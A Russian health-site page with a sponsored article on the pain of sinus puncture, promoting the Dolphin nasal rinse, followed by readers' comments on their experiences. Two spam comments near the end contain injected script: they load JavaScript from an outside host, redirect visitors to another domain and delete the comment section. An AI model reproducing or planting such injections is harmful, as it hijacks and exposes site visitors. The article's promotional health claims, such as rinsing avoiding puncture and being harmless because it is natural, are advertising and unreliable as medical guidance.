Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Прокол носа – жуткая вещь  >>  Прокол носа – жуткая вещь
 
Обратная связь
 

Прокол носа – жуткая вещь

Размер шрифта
17 февраля 2014 00:00
  • google_analytics: false
  • Нравится

«Я лежала с гайморитом. После прокола носа я четыре часа рыдала с кровяными фонтанами в носу. Когда хотели второй раз проколоть, я закатилась в истерике, сказала, хоть режьте, я не буду. Испытала и роды, и удаление коренных зубов, но эта боль запомнилась, как самая ­ужасная», – делится молодая девушка в одном из интернет-сообществе.

Прокол носа – жуткая вещь

Самый частый вопрос: «Это больно?»

Если вы зададите этот вопрос лор-врачу, он, скорее всего, скажет: «Нет, вы даже ничего не почувствуете. К тому же, процедура делается под местной анестезией».

Те, кто перенес эту процедуру, пишут на форумах: «Делать прокол – это жуткая боль, как будто у тебя мозги высасывают». Так кому же верить? Как обычно, истина где-то посередине. Врачи привыкли к тому, что лечение часто не обходится без боли.

нос

И сравнивая тяжелые последствия гайморита и боль от прокола, они приходят к выводу, что лучше небольшая боль, ведущая к излечению, чем осложнения. Но обычный человек с индивидуальным болевым порогом может надолго запомнить процедуру прокола как одну из самых болезненных в своей жизни.

Помните!

«Способствовать развитию гайморита может искривленная перегородка, кариес зубов, аллергия, хронический ринит, слабый иммунитет», – рассказывает лор-врач Татьяна Бабич. В таком случае нужно исправлять перегородку, лечить зубы, укреплять иммунитет и так далее.

Прокол – это крайняя меря лечения запущенного гайморита. Маленьким детям она не рекомендуется: при проведении прокола можно повредить нижнюю стенку глазницы, травмировать зачатки постоянных зубов. При ошибках в проведении процедуры возможны осложнения: слепота, внутричерепные осложнения.

Если начать комплексную терапию вовремя (антибиотики, противовоспалительные и разжижающие средства, промывание носа), прокола можно избежать.

Одна из основных задач во время лечения гайморита — наладить отток гноя из пазух носа. Эффективно  можно это сделать, промывая нос средством «Долфин».

Регулярное промывание носа позволяет избавиться от гайморита без прокола носа!

Применение «Долфина» повышает эффективность местных лекарственных средств: на очищенной слизистой лекарства действуют быстрее и лучше.

Поэтому, если врач назначил вам местные лекарственные средства, например, в виде капель, мази, спрея в нос, сначала промойте нос «Долфином», а потом применяйте лекарства.

Промывание носа — это отличная профилактика гайморита. Во время промывания удаляется скопившаяся слизь, восстанавливается носовое дыхание, уменьшается отек слизистой носа, снижается количество выделений.

Состав средства для промывания «Долфин» обладает противовоспалительным эффектом*. После промывания «Долфином» уменьшается воспаление слизистой, выздоровление наступает быстрее.

Промывать нос с «Долфином» можно каждый день: так как в его состав входят только натуральные компоненты, он не вредит слизистой и не оказывает дополнительной лекарственной нагрузки на организм.

*Эффективность и безопасность ирригационной терапии «Долфин» у пациентов с острым риносинуситом, Москва, 2010

www.dolphin.ru

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - наташа

17 февраля 2014 в 21:13

Цитировать   |   Пожаловаться

мне тоже делали прокол много лет назад.комшар!хватило на год.потом снова всё заложило.пошло искривление перегородки.теперь надо делать операцию.но  лор в поликлиннике  упорно не хочет замечать мою проблему.всё время как к нему приходишь,задаёт один и тотже вопрос:-кто вам сказал что у вас гайморит?и назначает всё одно и тоже.непойму,он что не видит что не помогает?когда сильно плохо ,иду к нему,чтоб узнать просто что не совсем критично у меня.хотя голова постоянно болит,задыхаюсь и ночью и днём,как нос заложит ,так сразу начинает лоб,глаза болеть.учищается сердце биение,поднимается давление. пробовала промывать долфином.почему то кружится голова и ощущение потеряности.прекратила.спреи помогают дышать,но давление в голове остаётся,прям чувствую как сосуды давят в голове.приходится капать нафтезин.знаю что плохо,но зато на какое то время проходят все эти ужасные симптомы.к доктору оброщаюсь редко,он бестолковый.)а на частных как и у многих людей нет денег.так и живу.впрочем как многие люди.все призывают,не заниматься самоличением.а что делать?если врач не может помочь.остаётся жить с этим и терпеть.как терплю все эти годы)хотя ужасно надоело задыхаться,и терпеть головную боль.но мы оптимисты не унываем)))

2 - Гость

19 февраля 2014 в 05:12

Цитировать   |   Пожаловаться

Вы не поверите,но я сделала 4 прокола подряд тоесть в неделю 1,5 -й не выдержала, у меня началось носовое  кровотечение прямо в кресле у доктора,кровь попала в желудок и дальше...медики знают что происходит..стало плохо,рвать начала ..но скажу что мой доктор мне делала местную анестезию 10 %лидокаином,после него ужасные головные боли,но зато я не чувствовала боли при проколе,просто тупые шкребки..а когда-то до этого 7 лет назад, я тоже не хотела делать промывание ,потом пришлось и на эту противную процедуру походить недели 2подряд ,уже после проколов.. ага,лежать и терпеть,ку -ку- кать,чтоб раствор не попал в глотку..и не захлебнуться..а все потому что не хтела делать раньше и проходила с гнойным гайморитом ,с кистой в гайморовой пазухе - 7 лет!! потом не выдержала после очередного осложненного гриппа и сама побежала !! просила чтоб весь гной зеленый убрали и что  готова терпеть..Вот так!! после всех процедур мне был назначен препарат Альдецин на беклометазоне ,его я использовала наверное года 2..по схеме доктора..+ промывала морской стерильной водой нос каждый раз перед испоьзовнием препарата..и вы знаете,я избавилась от  гнойного гайморита!!! и даже полипы поисчезали от препарата!! моя врач удивилась когда я приехала на осмотр..вот так!! бывают чудеса а бывают эффективное лечение!! всем здоровья!!не болейте,люди!!

3 - Гость

31 октября 2014 в 01:28

Цитировать   |   Пожаловаться

Именно изза промыванием долфином я получила свой первый гайморит.
Как оказалось, мне категорически нельзя промывать. Вот так вот

Мне врачи сразу сказали делать пункцию, но я надеялась обойдется. 10 дней на антибиотиках не привели ни к чему, что показало повторное кт. А жуткая головная боль, дезориентация, плавающее зрение, и гной во всех пазухах, даже основных так и оставались. Вчера сделали первую пункцию, сегодня вторую. Было больше ужасно страшно, чем больно, особенно второй раз. Боль была, но незначительная, скорее жуткое ощущение хруста хряща.

4 - Гость

30 декабря 2014 в 23:24

Цитировать   |   Пожаловаться

Мне делали прокол , с обеих сторон и норм, да хруст не приятный , но ничего ужасного не было, я даже не хныкала , так-что надо не бояться , а смело идти на лечение )

5 - zzzzzz

30 июня 2015 в 18:46

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 22:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Вся правда о соплях   Растительное масло спасет от слепоты   Ваш смартфон спасет вас от слепоты   По моче можно узнать все о глазах  
06 июня 2013Ваши сопли скажут, сумасшедший ли вы 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Рассеянный склероз
Странные сигналы вашего организма
Как снова хотеть секса

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.